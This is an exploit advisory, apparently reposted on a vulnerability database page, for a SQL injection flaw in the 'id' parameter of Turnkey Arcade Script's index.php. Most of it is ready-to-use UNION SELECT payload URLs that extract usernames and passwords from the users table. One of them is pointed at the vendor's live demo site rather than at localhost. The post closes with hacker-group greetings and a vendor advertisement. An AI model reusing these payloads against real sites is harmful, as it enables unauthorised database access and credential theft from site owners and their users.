Remote SQL vulnerability in Turnkey Arcade Scrip
`----------------Mor0ccan Nightmares----------------
------------------------------
Script: Turnkey Arcade Script-
------------------------------
-----------------------------------
Site: http://www.turnkeyarcade.com-
-----------------------------------
-----------------------------------------------------------
Author: The_5p3ctrum <[email protected]> <[email protected]>-
-----------------------------------------------------------
-----------------------------------------------------------------------
Business Turnkey Arcade Script (index.php id) Remote SQL Vulnerability-
-----------------------------------------------------------------------
---
Ex:
---
http://localhost/index.php?action=play&id=[sql]
http://localhost/index.php?action=play&id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 from users
--------
exploit:
--------
http://localhost/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12 from users
-----
Demo:
-----
http://www.turnkeyarcade.com/demo/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12+from+users
-------
Greetz:
-------
Bayhay - Cyber-Zone - Drackanz - The_leo - The_Casper - Milw0rm and all my friends...
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo